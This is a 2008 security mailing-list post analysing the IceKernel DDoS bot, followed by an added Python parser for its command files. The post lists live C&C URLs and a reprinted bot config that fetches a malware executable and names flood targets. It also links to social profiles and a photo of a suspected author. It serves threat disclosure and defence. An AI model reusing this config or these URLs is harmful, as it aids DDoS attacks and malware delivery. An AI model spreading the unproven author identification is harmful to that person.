[nsp-sec] IceKernel DDOS bot
jose nazario
jose at arbor.net
Mon Apr 21 13:23:54 EDT 2008
Kudos to ShadowServer for finding this one in their URL reports. They found
this while looking for CNN.com attack commands.
This is a Chinese DDoS bot that doesn't appear to be spread too far and wide
yet, but our visibility into Chinese malware infections is weaker than it
could be. [any help appreciated]
The bot uses Internet Explorer as a subprocess to grab the command files.
Live URLs:
www.shadowmp3.com/kernel/cmd.txt
888.17qb.com/hexinddos.txt
The command file grabbed by the malware is in INI format, which makes
parsing very easy. Below this message is an example cmd.txt; the
DDOS_*Flood sections are the obvious part of it. The INI file allows for
the full range of bot control: updates, check-in, etc. The C&C (over HTTP)
doesn't appear to require any access control or authorization; anyone can
grab the file(s).
AV detection is ambiguous but present:
F-Secure Trojan-Downloader.Win32.Agent.jpy
F-Prot6 W32/Backdoor2.ONY
AntiVir TR/Dldr.Root.258048
AntiVir BDS/Agent.gsn
NOD32 Win32/NetGuy.A
Kaspersky Trojan-Downloader.Win32.Agent.jpy
DrWeb DLOADER.Trojan
AVG7 Agent.PCK
ClamAV Trojan.Downloader-27207
Sample hashes (MD5/SHA1):
MD5: c321b997d4e8d442a7fb446c4107ba7b
SHA1: e7ab17a1d9ed8d3df9f7ca64eb387b514a294ca7
File type: application/x-ms-dos-executable
File size: 341504 bytes
MD5: c8d008b22252b2be2314db9beb769660
SHA1: f78ac1be2f4882cd8b7f750112b8e7fed7f14ac3
File type: application/x-ms-dos-executable
File size: 262144 bytes
MD5: b6b2af669e6bc44ee6c5c4cffc2c6f60
SHA1: 6b6536d4cd89a57b6084d783e01455bbeb2ecdc2
File type: application/x-ms-dos-executable
File size: 58368 bytes
About the Author, we think he uses the handle IceKernel:
http://v.wangyou.com/p14971.html
http://hi.csdn.net/iceker2008
http://twitter.com/icekernel
http://www.flickr.com/photos/icekernel/
http://www.bulaoge.com/?icekernel
Here's what we think is his picture:
http://images.v.wangyou.com/photo/2006/3/28/1020060328224720137_1.jpg
Analysis is ongoing, and I'm starting to track these attacks. Any additional
data etc would be greatly appreciated and would benefit the entire nsp-sec
community.
Thanks.
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
security researcher, office of the CTO
Arbor Networks
v: +1 734 821 1427
m: +1 734 693 2969
PGP: 0x40A7BF94
www.arbornetworks.com
-------------------------------------------------------------
Notes:
1. an example cmd.txt file from a live site:
[UpdateServer]
NewVersion=20080419
UpdateFileUrl=http://888.17qb.com/hexinddos.exe
[KernelSetting]
IsReportState=1
ReportStateUrl=http://888.17qb.com/hexin.htm
IsDownFileRun0=0
DownFileRunName0=KernelDbg1.exe
DownFileRunUrl0=
IsDownFileRun1=0
DownFileRunName1=KernelDbg2.exe
DownFileRunUrl1=
IsDownFileRun2=0
DownFileRunName2=KernelDbg3.exe
DownFileRunUrl2=
[DDOS_ScriptFlood]
IsScriptFlood=0
CmdID=33
ScriptFloodUrl=http://www.xk45.cn/
ScriptFloodDNS=www.xk45.cn
ScriptFloodPort=80
ThreadCount=5
IsTimer=1
Timer=20
[DDOS_UdpFlood]
IsUdpFlood=0
CmdID=12
UdpFloodDNS=88.88.88.88
ThreadCount=1
IsTimer=1
Timer=10
[DDOS_SynFlood]
IsSynFlood=0
CmdID=12
SynFloodDNS=www.1698woool.com
SynFloodPort=80
ThreadCount=1
IsTimer=1
Timer=10
[DDOS_TcpFlood]
IsTcpFlood=0
CmdID=18
TcpFloodDNS=www.dadiyt.cn
TcpFloodPort=80
ThreadCount=10
IsTimer=1
Timer=15
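The INI layout above lends itself to mechanical parsing. The following Python script is an added example, not code from the post or from the bot's author: it reads the quoted cmd.txt with the standard configparser module, turns each DDOS_*Flood section into a record, and separates the operator's own hosts (update and report URLs, which a defender would block or sinkhole) from the flood targets (hosts a defender would alert on when infected machines start talking to them). It assumes only the key naming convention visible in the sample (Is<Name>Flood, <Name>FloodDNS, <Name>FloodPort, ThreadCount, IsTimer/Timer); the embedded sample input is the post's cmd.txt, abridged.

```python
import configparser
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Sample input: the cmd.txt quoted in the post, abridged (the empty
# DownFileRun1/2 entries and the DDOS_SynFlood section are omitted).
SAMPLE_CMD_TXT = """\
[UpdateServer]
NewVersion=20080419
UpdateFileUrl=http://888.17qb.com/hexinddos.exe
[KernelSetting]
IsReportState=1
ReportStateUrl=http://888.17qb.com/hexin.htm
IsDownFileRun0=0
DownFileRunName0=KernelDbg1.exe
DownFileRunUrl0=
[DDOS_ScriptFlood]
IsScriptFlood=0
CmdID=33
ScriptFloodUrl=http://www.xk45.cn/
ScriptFloodDNS=www.xk45.cn
ScriptFloodPort=80
ThreadCount=5
IsTimer=1
Timer=20
[DDOS_UdpFlood]
IsUdpFlood=0
CmdID=12
UdpFloodDNS=88.88.88.88
ThreadCount=1
IsTimer=1
Timer=10
[DDOS_TcpFlood]
IsTcpFlood=0
CmdID=18
TcpFloodDNS=www.dadiyt.cn
TcpFloodPort=80
ThreadCount=10
IsTimer=1
Timer=15
"""


@dataclass
class FloodCommand:
    section: str          # e.g. "DDOS_TcpFlood"
    enabled: bool         # Is<Name>Flood=1 tells the bot to run this attack
    cmd_id: int
    target: str           # <Name>FloodDNS: victim hostname or IP
    port: Optional[int]   # <Name>FloodPort; the UDP section carries none
    threads: int
    timer: Optional[int]  # Timer value, meaningful only when IsTimer=1


def parse_cmd_txt(text):
    """Parse an IceKernel-style cmd.txt into update/report URLs and flood commands."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case so the "Is" + name lookups match
    cp.read_string(text)
    floods = []
    for section in cp.sections():
        if not section.startswith("DDOS_"):
            continue
        name = section[len("DDOS_"):]  # "ScriptFlood", "UdpFlood", ...
        sec = cp[section]
        floods.append(FloodCommand(
            section=section,
            enabled=sec.get("Is" + name, "0") == "1",
            cmd_id=int(sec.get("CmdID", "0")),
            target=sec.get(name + "DNS", ""),
            port=int(sec[name + "Port"]) if name + "Port" in sec else None,
            threads=int(sec.get("ThreadCount", "0")),
            timer=int(sec["Timer"]) if sec.get("IsTimer") == "1" else None,
        ))
    kernel = cp["KernelSetting"] if cp.has_section("KernelSetting") else {}
    return {
        "version": cp.get("UpdateServer", "NewVersion", fallback=None),
        "update_url": cp.get("UpdateServer", "UpdateFileUrl", fallback=None),
        "report_url": kernel.get("ReportStateUrl"),
        # Secondary payload URLs; an empty value means "nothing to fetch"
        "drop_urls": [v for k, v in kernel.items()
                      if k.startswith("DownFileRunUrl") and v],
        "floods": floods,
    }


def split_indicators(parsed):
    """Operator infrastructure (block/sinkhole) vs. victims (alert on traffic to them)."""
    c2_hosts = {urlparse(u).hostname
                for u in [parsed["update_url"], parsed["report_url"], *parsed["drop_urls"]]
                if u}
    targets = {f.target for f in parsed["floods"] if f.target}
    return c2_hosts, targets
```

On the embedded sample every Is*Flood flag is 0, so the parser reports all attacks idle, matching the live file at capture time; the useful monitoring signal is a re-fetch where one of those flags flips to 1 or a new target host appears, since that is the moment infected machines begin sending traffic to the named victim.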